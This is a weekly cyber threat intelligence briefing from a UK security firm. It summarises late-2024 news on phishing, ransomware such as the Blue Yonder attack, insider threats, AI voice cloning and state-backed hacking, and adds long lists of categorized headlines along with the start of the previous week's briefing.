-Cyber Attacks Cost UK Businesses £44 Billion During Past 5 Years, Howden Survey
-83% of Organisations Reported Insider Attacks in 2024
-Blue Yonder Ransomware Attack Disrupts Supply Chains Across UK and US
-North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
-UK Scam Losses Surge 50% Annually to £11.4bn
-In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security
-Russian Threat Actors Poised to Cripple Power Grid, UK Warns
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Phishing Attacks Dominate Threat Landscape in Q3 2024
ReliaQuest's recent report reveals that spear phishing attacks accounted for 46% of security incidents in Q3 2024, becoming the most prevalent threat. High employee turnover and accessible phishing kits contribute to this trend, with untrained new hires increasing vulnerability. The report also highlights a 20% surge in cloud-based security threats and a 7% rise in insider threat activity, with cyber criminals offering up to $10,000 weekly for insider assistance. Despite awareness of these risks, organisations continue to face significant challenges in mitigating them.
Rising Cyber Threat Driven by Single Point of Failure Risk
CyberCube reports that escalating cloud service provider outages and single point of failure events are significantly increasing the risk of unplanned technology outages for organisations. These disruptions are accelerating, impacting critical services across sectors. The report highlights that the Energy & Utilities industry is highly exposed with varying security levels, while the Transportation & Logistics sector is exposed but more secure. Many US public sector entities are under-secured despite high exposure to cyber threats. It emphasises that insurers must adapt by refining policy language, enhancing threat intelligence, and collaborating with governments to mitigate these evolving risks.
Cloned Customer Voice Beats Bank Security Checks
Recent investigations have revealed that AI-cloned voices can bypass voice recognition security in banking systems. A BBC test showed that cloned voices successfully overcame voice ID checks at major banks, including Santander and Halifax. Despite assurances from banks about the security of voice ID, the ease with which these systems were breached, even using basic equipment, highlights significant vulnerabilities. Cyber security experts warn that the rapid advancement of generative AI presents new risks to biometric authentication methods. This raises concerns about the effectiveness of current security measures and underscores the need for enhanced protections against sophisticated AI-enabled fraud.
Avoiding Cyber Complacency as a Small Business
A recent survey revealed that half of all UK businesses, including many small and medium-sized enterprises, experienced a cyber attack in the past year. Despite this high incidence, only 22% have a formal incident response plan, indicating widespread cyber complacency. With the average cost to remedy an attack estimated at £21,000, small businesses are at significant financial risk. Many maintain outdated security measures and prioritise other concerns due to limited resources. To mitigate these risks, organisations are advised to stay vigilant, educate employees on threats like phishing, implement robust backup solutions, and develop clear disaster recovery plans.
Your IT Infrastructure May Be More Outdated Than You Think
Kyndryl's recent survey reveals a significant disconnect between CEOs and IT leaders regarding IT infrastructure readiness. While about two-thirds of CEOs are concerned their IT systems are outdated or nearing end-of-life, 90% of IT leaders believe their infrastructure is best in class. Contradictorily, only 39% of IT leaders feel prepared to manage future risks and disruptions, and 44% of executives admit their IT systems have aged past expected lifespans. The report underscores the need for continual reassessment of IT tools to balance operational needs with innovation, as outdated systems can quickly hinder an organisation's competitiveness.
Cyber Attacks Cost UK Businesses £44 Billion During Past 5 Years, Howden Survey
Howden's research has revealed that cyber attacks have cost UK businesses £44 billion in lost revenue over the past five years. Over half of these businesses, particularly those with revenues over £100 million, have suffered at least one cyber attack, with compromised emails and data theft being the most common causes. Despite this significant impact, the uptake of basic cyber security measures remains low, with only 61% using antivirus software and 55% employing network firewalls. The report suggests that implementing fundamental cyber security practices could reduce cyber attack costs by up to 75%, saving approximately £30 billion over five years.
83% of Organisations Reported Insider Attacks in 2024
A publication by news site Cybersecurity Insiders reports that 83% of organisations experienced at least one insider attack in the past year. The incidence of insider threats has escalated, with the percentage of organisations facing between 11 to 20 attacks increasing from 4% to 21% in the last 12 months. Despite 93% recognising the importance of strict visibility and control, only 36% have effective solutions in place. Recovery costs are significant, with 32% of organisations spending between $100,000 and $499,000, and 21% facing costs between $1 million and $2 million. Lack of employee awareness is a major factor, with 32% citing it as a contributor to attacks.
Blue Yonder Ransomware Attack Disrupts Supply Chains Across UK and US
Blue Yonder, a supply chain software company, has experienced a ransomware attack that disrupted services for major clients. The incident impacted key customers, including Starbucks and leading UK supermarkets like Morrisons and Sainsbury's, causing operational disruptions and forcing activation of contingency plans. Despite working with external cyber security experts, Blue Yonder has yet to provide a timeline for restoration. This event underscores the increasing vulnerability of supply chains to cyber attacks. A recent survey found that 62% of organisations faced ransomware attacks from software supply chain partners in the past year, highlighting the widespread nature of these threats.
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
Microsoft has reported that North Korean hackers have stolen over $10 million in cryptocurrency through sophisticated social engineering campaigns on LinkedIn. These cyber security threats are escalating, with attackers posing as recruiters or venture capitalists to trick targets into downloading malware. Despite increased awareness, organisations remain vulnerable as hackers use artificial intelligence tools to create convincing fake profiles and documents. North Korean IT workers abroad have also generated at least $370,000 through legitimate work, but pose additional risks by abusing access to steal intellectual property and demand ransoms.
UK Scam Losses Surge 50% Annually to £11.4bn
Cifas reports that UK online fraud losses have surged to over £11bn in the past year, a £4bn increase from the previous year. 15% of the 2000 survey participants lost money to scammers in 2024, up from 10% in 2023, with average losses of £1400 per victim. Less than a fifth recovered their money, and only 28% reported the incidents to the police. Email was the most common fraud channel, cited by nearly 70% of respondents. With scams expected to intensify during the holiday season, there is a pressing need for improved security measures and cross-sector collaboration.
In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security
Enterprises are facing a more sophisticated threat landscape due to digital transformation, hybrid work, and AI adoption, making it imperative to prioritise cyber security. Leadership at the C-suite and board level must drive this change by investing appropriately, as underfunded security can lead to lost revenue and legal issues. A strong, empowered CISO is crucial for identifying vulnerabilities and guiding necessary actions. Adopting frameworks like NIST Cybersecurity Framework 2.0 helps organisations manage risks effectively, promoting prevention and response strategies that can also reduce liability in the event of a breach.
Russian Threat Actors Poised to Cripple Power Grid, UK Warns
The UK government warns that Russian cyber threat actors are poised to conduct cyber attacks that could disrupt critical national infrastructure, potentially "turning off the lights for millions". These threats have already targeted UK media, telecoms, and political institutions. However, experts caution that such rhetoric may overstate Russia's actual capabilities and risk causing unnecessary panic. In response, the government is investing £8.22 million in a new AI cyber lab to bolster national security and an additional £1 million to enhance incident response among allies.
Sources:
https://informationsecuritybuzz.com/phishing-attacks-dominate-threat-lands/
https://www.emergingrisks.co.uk/rising-cyber-threat-driven-by-single-point-of-failure-risk/
https://www.bbc.co.uk/news/articles/c1lg3ded6j9o
https://betanews.com/2024/11/28/avoiding-cyber-complacency-as-a-small-business/
https://www.cio.com/article/3610867/your-it-infrastructure-may-be-more-outdated-than-you-think.html
https://www.insurancejournal.com/news/international/2024/11/27/802913.htm
https://securityintelligence.com/articles/83-percent-organizations-reported-insider-threats-2024/
https://thehackernews.com/2024/11/north-korean-hackers-steal-10m-with-ai.html
https://www.infosecurity-magazine.com/news/uk-scam-losses-surge-50-annually/
Governance, Risk and Compliance
Cyber attacks cost British businesses $55 billion in past five years, broker says | Reuters
Beyond the Technical: The Evolving CISO - InfoRiskToday
What Does Enterprise-Wide Cyber Security Culture Look Like?
Cyber Security Under Threat: New Study Exposes 'Security Chaos' | Pressat
What is compliance risk? | Definition from TechTarget
Top challenges holding back CISOs’ agendas | CSO Online
The CISO as a Chess Piece: A Comprehensive Strategic Analysis | Mandelbaum Barrett PC - JDSupra
Cyber Security Toolkit for Boards: updated briefing pack... - NCSC.GOV.UK
Threats
Ransomware, Extortion and Destructive Attacks
Five Ransomware Groups Responsible for 40% of Cyber-Attacks in 2024 - Infosecurity Magazine
One of the nastiest ransomware groups around may have a whole new way of doing things | TechRadar
VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks
CISA says BianLian ransomware now focuses only on data theft
The case for a ransomware payment ban - Tech Monitor
Growth in phishing, changes in ransomware crews mark threat landscape | SC Media
Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine
Ransomware payments are now a critical business decision - Help Net Security
Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert
BlackBasta Ransomware Brand Picks Up Where Conti Left Off
CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media
Mimic Ransomware: What You Need To Know | Tripwire
Zyxel firewalls targeted in recent ransomware attacks
Victims Must Disclose Ransom Payments Under Australian Law
Ransomware Victims
Microlise Confirms Data Breach as Ransomware Group Steps Forward - SecurityWeek
Blue Yonder ransomware attack disrupts supply chains across UK and US
Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack
Supply chain vendor Blue Yonder succumbs to ransomware • The Register
NHS declares major cyber incident for third time this year • The Register
Further disruption expected after latest NHS cyber attack | Computer Weekly
Phishing & Email Based Attacks
Phishing Attacks Dominate Threat Landscape In Q3 2024
Email Phishing and DMARC Statistics - Security Boulevard
Growth in phishing, changes in ransomware crews mark threat landscape | SC Media
Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase
Rise in phishing attacks observed from August to October 2024
Flying Under the Radar - Security Evasion Techniques
Phishing attacks via ‘URL rewriting’ to evade detection escalate | SC Media
Scammers use you're fired lures in phishing campaign • The Register
“Sad announcement” email implies your friend has died | Malwarebytes
OpenSea NFT Phishers Aim to Drain Crypto Wallets
Email Is Insecure: 4 Reasons I Avoid It Like the Plague
Three-Quarters of Black Friday Spam Emails Identified as Scams - Infosecurity Magazine
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
How to recognize employment fraud before it becomes a security issue - Help Net Security
Meta Finally Breaks Its Silence on Pig Butchering | WIRED
Bangkok busts SMS Blaster sending 1 million scam texts from a van
North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek
Artificial Intelligence
Cloned customer voice beats bank security checks - BBC News
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
Over a Third of Firms Struggling With Shadow AI - Infosecurity Magazine
AI in cyber security: Not yet autonomous, but the time to prepare is now
British spies to ramp up fight against Russian cyber threats with launch of cutting-edge... - LBC
Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters
Faux ChatGPT, Claude API Packages Deliver JarkaStealer
AI is the latest tool in the cyber security cat-and-mouse game - Fast Company
AI Used for Good and Bad — Like Making Trickier Malware, Says Report
Teaching AI to Hack: Researchers Demonstrate ChatGPT's to Ethically Hack Linux & Windows
Organisations unprepared for the AI onslaught must do these 4 things | ZDNET
'Tis the season for website cloning tools, RCEs and AI phishing lures | SC Media
2FA/MFA
‘Adversary in the middle attacks’ are becoming hackers’ go-to method to bypass MFA | ITPro
Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase
Malware
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
2024 saw a surge in malicious free VPN apps | TechRadar
Russian Hackers Deploy HATVIBE and CHERRYSPY Malware Across Europe and Asia
Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media
Salt Typhoon hackers backdoor telcos with new GhostSpider malware
What cyber attacks are bots commonly associated with?
Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine
Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries
Skimmer Malware Targets Magento Sites Ahead of Black Friday
APT-K-47 Uses Hajj-Themed Lures to Deliver Advanced Asyncshell Malware
Hackers abuse Avast anti-rootkit driver to disable defences
Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections
IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine
The source code of Banshee Stealer leaked online
Faux ChatGPT, Claude API Packages Deliver JarkaStealer
How Facebook and Instagram Malware Works (and How to Spot It Before You Click)
Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels
AI Used for Good and Bad — Like Making Trickier Malware, Says Report
APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign
Gaming Engines: An Undetected Playground for Malware Loaders - Check Point Research
Bots/Botnets
What cyber attacks are bots commonly associated with?
Growing Matrix Botnet Poses Escalating Global Threat
Mobile
Why you should power off your phone once a week - according to the NSA | ZDNET
One Down, Many to Go with Pre-Installed Malware on Android | Electronic Frontier Foundation
Denial of Service/DoS/DDoS
Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop
Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack
Internet of Things – IoT
My Car Knows My Secrets, and I'm (Mostly) OK With That
Growing Matrix Botnet Poses Escalating Global Threat
IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine
Data Breaches/Leaks
Prison layouts reportedly leaked on dark web in data breach - BBC News
Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records
New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek
A US soldier is suspected of being behind the massive Snowflake data leak | CSO Online
Data broker leaves 600K+ sensitive files exposed online • The Register
TfL cyber attack: Independent review will examine huge hack and response | The Standard
Military dating site leaves database with 1M records exposed | Biometric Update
HIA: Survivors awarded £30,000 after data breach - BBC News
Zello asks users to reset passwords after security incident
Hack Against Andrew Tate Continues With Leak Of Staff Chats
Hackers Breach Andrew Tate's Online 'University,' Exposing 800,000 Users
Organised Crime & Criminal Actors
The rise and fall of the 'Scattered Spider' hackers | TechCrunch
Major cyber crime crackdowns signal shift in global cyber security strategies
Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net
Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security
US alleges man is cyber crook with distaste for opsec • The Register
DoJ seized credit card marketplace PopeyeTools
DOJ: Man hacked networks to pitch cyber security services
'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Crypto Hacks Drop 15% Year-to-Date, over $70 Million Lost in November
OpenSea NFT Phishers Aim to Drain Crypto Wallets
Insider Risk and Insider Threats
83% of organisations reported insider attacks in 2024
Human Factors in Cyber Security in 2024 | UpGuard
Insurance
Cyber attacks cost British businesses $55 billion in past five years, broker says | Reuters
Supply Chain and Third Parties
Rising cyber threat driven by Single Point of Failure risk
Blue Yonder ransomware attack disrupts supply chains across UK and US
Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack
Supply chain vendor Blue Yonder succumbs to ransomware • The Register
Outages
Microsoft CEO Nadella Calls for 'Culture Change' After Security Lapses - Business Insider
Rising cyber threat driven by Single Point of Failure risk
Microsoft 365 outage impacts Exchange Online, Teams, Sharepoint
Microsoft aims for better Windows security • The Register
CrowdStrike still doesn’t know cost of Falcon flame-out • The Register
Encryption
Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine
Linux and Open Source
Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media
Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels
Passwords, Credential Stuffing & Brute Force Attacks
I Ran a Password Audit and Was Suprised How Many Outdated Passwords I Have
Zello asks users to reset passwords after security incident
Stop Using Your Passwords—1Password And Google Warn
Social Media
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
Meta Finally Breaks Its Silence on Pig Butchering | WIRED
Meta Shutters Two Million Scam Accounts in Pig Butchering Crackdown - Infosecurity Magazine
How Facebook and Instagram Malware Works (and How to Spot It Before You Click)
Regulations, Fines and Legislation
The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra
New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek
EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra
HIA: Survivors awarded £30,000 after data breach - BBC News
US senators propose mandated MFA, encryption in healthcare • The Register
Opportunities for Regulatory Harmonization Under Trump's Deregulation Agenda
Telecoms Security Act Compliance... - Analysis - Mobile News
Cyber security bill passes parliament - Security - iTnews
Victims Must Disclose Ransom Payments Under Australian Law
Models, Frameworks and Standards
The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra
EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra
Why Cyber Security Leaders Trust the MITRE ATT&CK Evaluations
Careers, Working in Cyber and Information Security
Practical strategies to build an inclusive culture in cyber security - Help Net Security
8 Tips for Hiring Neurodivergent Talent
Why IT Leaders Should Hire Veterans for Cyber Security Roles
How cyber security certification can drive business growth - Digital Journal
The Next Hot Cyber Security Skill for Your Resume? Empathy
Law Enforcement Action and Take Downs
The rise and fall of the 'Scattered Spider' hackers | TechCrunch
Major cyber crime crackdowns signal shift in global cyber security strategies
Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net
Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security
Bangkok busts SMS Blaster sending 1 million scam texts from a van
US alleges man is cyber crook with distaste for opsec • The Register
DoJ seized credit card marketplace PopeyeTools
Telco engineer spying on employer for Beijing gets 4 years • The Register
US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency
Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine
DOJ: Man hacked networks to pitch cyber security services
'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld
Police bust pirate streaming service making €250 million per month
Telco engineer spying on employer for Beijing gets 4 years • The Register
Misinformation, Disinformation and Propaganda
Google Deindexes Chinese Propaganda Network - Infosecurity Magazine
Google blocked 1000 pro China websites from services • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters
“Cyber war is now a daily reality”, UK government minister says
UK calls for stronger NATO cyber defences
5th Generation War: A War Without Borders and its Impact on Global Security - Modern Diplomacy
Nation State Actors
China
The Cyberthreats from China are Ongoing: U.S. Officials - Security Boulevard
Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries
Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia
Satellite Image Shows Chinese Ship Suspected of Sabotage in 'NATO Lake' - Newsweek
Salt Typhoon’s cyber storm reaches beyond US telcos • The Register
Chinese hackers preparing for conflict, says US cyber official | The Straits Times
Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media
China's Cyber Offensives Helped by Private Firms, Academia
Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN
Google Deindexes Chinese Propaganda Network - Infosecurity Magazine
China's telco attacks mean 'thousands' of boxes compromised • The Register
Top senator calls Salt Typhoon “worst telecom hack in our nation’s history” - The Washington Post
CrowdStrike identifies new China hackers breaching telecom networks
NSA Director Wants Industry to Disclose Details of Telecom Hacks - Bloomberg
T-Mobile Engineers Spotted Hackers Running Commands on Routers - Bloomberg
Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions | Trend Micro (US)
US must counter new Chinese cyber attacks. Remember how it lost nuclear monopoly?
China Conceling State, Corporate & Academic Assets For Offensive Attacks
China’s Surveillance State Is Selling Citizen Data as a Side Hustle | WIRED
Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine
Google blocked 1000 pro China websites from services • The Register
Telco engineer spying on employer for Beijing gets 4 years • The Register
US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency
Telco engineer spying on employer for Beijing gets 4 years • The Register
Imagine a land where algorithms don't ruin the Internet • The Register
Russia
Britain should prepare for 'aggressive and reckless' Russian cyber attacks, minister warns
Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia
Russian Cyberespionage Group Hit 60 Victims in Asia, Europe - SecurityWeek
Russian Spies Jumped From One Network to Another Via Wi-Fi in an Unprecedented Hack | WIRED
Nato countries are in a ‘hidden cyber war’ with Russia, says Liz Kendall | The Standard
Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters
Nato countries in 'hidden cyber war' with Russia, minister warns | ITV News
Russian hybrid attacks may lead to NATO invoking Article 5, says German intel chief | Reuters
Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN
RomCom Exploits Zero-Day Firefox and Windows Flaws in Sophisticated Cyber Attacks
Firefox and Windows zero-days exploited by Russian RomCom hackers
Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack
Russia-linked APT TAG-110 uses targets Europe and Asia - Security Affairs
'Operation Undercut' Adds to Russia Influence Campaigns
CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media
CISA says BianLian ransomware now focuses only on data theft
Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop
Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine
North Korea
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign
Man warns 'this is just the beginning' after cyber attack on Merseyside Police - Liverpool Echo
Tools and Controls
VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks
2024 saw a surge in malicious free VPN apps | TechRadar
How to recognize employment fraud before it becomes a security issue - Help Net Security
AI in cyber security: Not yet autonomous, but the time to prepare is now
Email Phishing and DMARC Statistics - Security Boulevard
Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert
Microsoft Teams monitoring tips for admins | TechTarget
What is compliance risk? | Definition from TechTarget
Is Cyber Threat Intelligence Worthless? - Security Boulevard
Machine Learning in Cyber Security: Harnessing the Power of Five AI Tribes - Security Boulevard
CIOs warned of AI over-reliance in cyber security defence
AI Used for Good and Bad — Like Making Trickier Malware, Says Report
Modern workplaces increasingly resemble surveillance zones • The Register
The role of data recovery in cyber resilience
AI is the latest tool in the cyber security cat-and-mouse game - Fast Company
Businesses prioritize cyber security in digital transformation: GSMAi
Data Security Best Practices: 7 Tips to Crush Bad Actors | MSSP Alert
Cloudflare says it lost 55% of logs pushed to customers for 3.5 hours
DOJ: Man hacked networks to pitch cyber security services
'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld
The ‘Great IT Rebrand’: Restructuring IT for business success | CIO
Other News
Your beloved old tech is a security risk. It's time to let go | PCWorld
Latest Multi-Stage Attack Scenarios with Real-World Examples
Avoiding cyber complacency as a small business
Will 2025 be the turning point for cyber security in finance? - FinTech Futures: Fintech news
Microsoft CEO Nadella Calls for 'Culture Change' After Security Lapses - Business Insider
Microsoft aims for better Windows security • The Register
The threats of USB-based attacks for critical infrastructure | TechRadar
The industries impacted most by cyber crime in 2024
Cyber Attacks On Healthcare: A Global Threat That Can’t Be Ignored | Scoop News
Six future-proofing strategies family offices need to stay ahead
The rise in public sector cyber attacks and what can be done | London City Hall
TfL cyber attack: Independent review will examine huge hack and response | The Standard
Craigslist founder on his $100M pledge to fight cyber attacks on US
DOJ Will Reportedly Force Google to Sell Off Chrome Browser
10 Of The Worst Cyber Security Mistakes You're Probably Making Right Now
Protect your charity from cyber crime - GOV.UK
Forensic audit of the US election is needed to protect democracy
Vulnerability Management
VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks
400,000 Systems Potentially Exposed to 2023's Most Exploited Flaws - SecurityWeek
Google’s AI-powered fuzzing tool discovers 26 new vulnerabilities | SC Media
How should software producers be held accountable for shoddy cyber security products?
The effect of compliance requirements on vulnerability management strategies - Help Net Security
Vulnerabilities
Researchers reveal exploitable flaws in corporate VPN clients - Help Net Security
Critical 7-Zip Vulnerability Let Attackers Execute Arbitrary Code
Firefox and Windows zero-days exploited by Russian RomCom hackers
Hackers abuse Avast anti-rootkit driver to disable defences
Microsoft Patches Exploited Vulnerability in Partner Network Website - SecurityWeek
WordPress Plugin Flaw Exposes 200,000 WordPress Sites To Hacking
VMware Patches High-Severity Vulnerabilities in Aria Operations - SecurityWeek
Hackers exploit critical bug in Array Networks SSL VPN products
Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections
Zyxel firewalls targeted in recent ransomware attacks
Malicious Actors Exploit ProjectSend Critical Vulnerability - Infosecurity Magazine
Critical QNAP Vulnerability Let Attackers Execute Remote Code
IBM Patches RCE Vulnerabilities in Data Virtualization Manager, Security SOAR - SecurityWeek
Weekend QNAP, Veritas bugs hit patch pipelines • The Register
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 22 November 2024
Black Arrow Cyber Threat Intelligence Briefing 22 November 2024:
-Cyber Security Dominates Concerns Among the C-Suite, Small Businesses and the Nation
-Cyber Criminals Don’t Take Holidays Warns Expert
-The Urgent and Critical Need to Prioritise Mobile Security
-Companies Take Over Seven Months to Recover from Cyber Incidents
-Data is the New Uranium – Incredibly Powerful and Amazingly Dangerous
-‘Scam Yourself’ Attacks Just Increased Over 600% - Here’s What to Look For
-60% of Emails with QR Codes Classified as Spam or Malicious
-Coalition Highlights 68% Surge in Ransomware Claims Severity, as Active Ransomware Groups Increase 56%
-One Deepfake Digital Identity Attack Strikes Every Five Minutes
-Supply Chain Attacks Up Over 400 Percent Since 2021
-Rethinking Cyber Security from Cost Centre to Value Driver
-Majority of UK Businesses Lack Readiness for Rising AI-Led Phishing Attacks, Reveals Survey
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Cyber Security Dominates Concerns Among the C-Suite, Small Businesses and the Nation
Cyber security is now the top concern for organisations globally, with the 2024 Allianz Risk Barometer naming cyber events as the number one business risk. Gartner forecasts a 15% increase in information security spending by 2025, reaching $212 billion. Small businesses are also vulnerable, with 60% ranking cyber security risks as major concerns. Generative AI introduces new threats, and Gartner predicts that by 2027, 17% of cyber attacks and data leaks will involve generative AI.
Cyber Criminals Don’t Take Holidays Warns Expert
Semperis has found that cyber attacks during holidays and weekends pose a significant risk to businesses because many are underprepared to handle incidents outside of standard working hours. These risks intensify when an organisation’s security capability is reduced on holidays and weekends. The report highlighted that identity-related attacks are a major concern, yet a quarter of respondents feel they lack the expertise to protect against them, and over 22% don't have an identity recovery plan in place.
The Urgent and Critical Need to Prioritise Mobile Security
Recent findings reveal that mobile security threats are a top concern for organisations. With over 55% of organisations increasing their mobile device users and more than 70% of employees using smartphones for work tasks, threats like mobile phishing and malware are intensifying. The report indicates that 82% of phishing websites are designed for mobile users, and 200 malicious apps on Google Play have been downloaded 8 million times. Despite this, many organisations face challenges in mitigating mobile risks due to device diversity and user control, highlighting a critical need for improved mobile security measures.
Companies Take Over Seven Months to Recover from Cyber Incidents
A new report reveals that organisations are underestimating recovery times from cyber incidents, with actual recovery averaging over seven months, 25% longer than anticipated. This gap widens to nearly 11 months for companies reducing cyber security investments. Despite efforts like implementing stronger security measures (43%) and offering additional employee training (41%), nearly half of organisations are rethinking how they use existing cyber security tools. The study also highlights a shift towards shared responsibility, with platform engineering teams and app developers increasingly held accountable alongside traditional roles like Chief Information Security Officers (CISOs) and CIOs.
Data is the New Uranium – Incredibly Powerful and Amazingly Dangerous
Recent insights from Chief Information Security Officers (CISOs) indicate that data-related risks are becoming a primary concern for organisations. The vast and dispersed nature of data storage has led many CISOs to feel that the cost of managing data now outweighs its value. There’s a growing perception that the business proposition of ‘big data’ is shifting from a net positive to a net negative. This underscores the urgent need for organisations to manage data carefully and to be fully aware of the risks and costs associated with potential breaches.
‘Scam Yourself’ Attacks Just Increased Over 600% - Here’s What to Look For
Gen, the company behind Norton and Avast, reports a 614% surge in ‘scam yourself’ cyber attacks in the third quarter compared to the second. These scams leverage social engineering to trick users into downloading malware themselves. Notably, over two million people worldwide were targeted by fake captcha scams in the past quarter. Despite increased vigilance, users remain vulnerable to fake updates, deceptive fixes, and counterfeit tutorials that often instruct them to disable antivirus software or input commands that compromise security.
60% of Emails with QR Codes Classified as Spam or Malicious
Cisco Talos has found that 60% of emails containing QR codes are classified as spam, with some being malicious and targeting users with phishing or credential theft. Despite representing only about one in 500 global emails, these QR code emails effectively bypass security filters. Attackers use deceptive methods like blending QR codes into attractive designs. The report emphasises the importance of ‘defanging’ QR codes to neutralise threats, and advises treating QR codes with the same caution as unknown URLs. Users should be vigilant when scanning QR codes and avoid entering credentials into unknown sites linked via QR codes.
Coalition Highlights 68% Surge in Ransomware Claims Severity, as Active Ransomware Groups Increase 56%
Coalition's latest report reveals a 68% surge in the severity of ransomware claims, with average losses escalating to $353,000. Searchlight Cyber has found a 56% increase in active ransomware groups in the first half of 2024, tracking 73 groups compared to 46 last year. This rise indicates that the fight against ransomware is far from over. The impact of ransomware has intensified, particularly affecting larger companies. Coalition also notes a rise in significant cyber risk aggregation events (which cause widespread loss to other organisations) disrupting a substantial proportion of healthcare firms and auto dealerships with revenues over $100 million. Business email compromise remains the most common cyber incident, increasing by 4% and constituting nearly one-third of all cyber insurance claims. Meanwhile, claims severity overall rose by 14%.
One Deepfake Digital Identity Attack Strikes Every Five Minutes
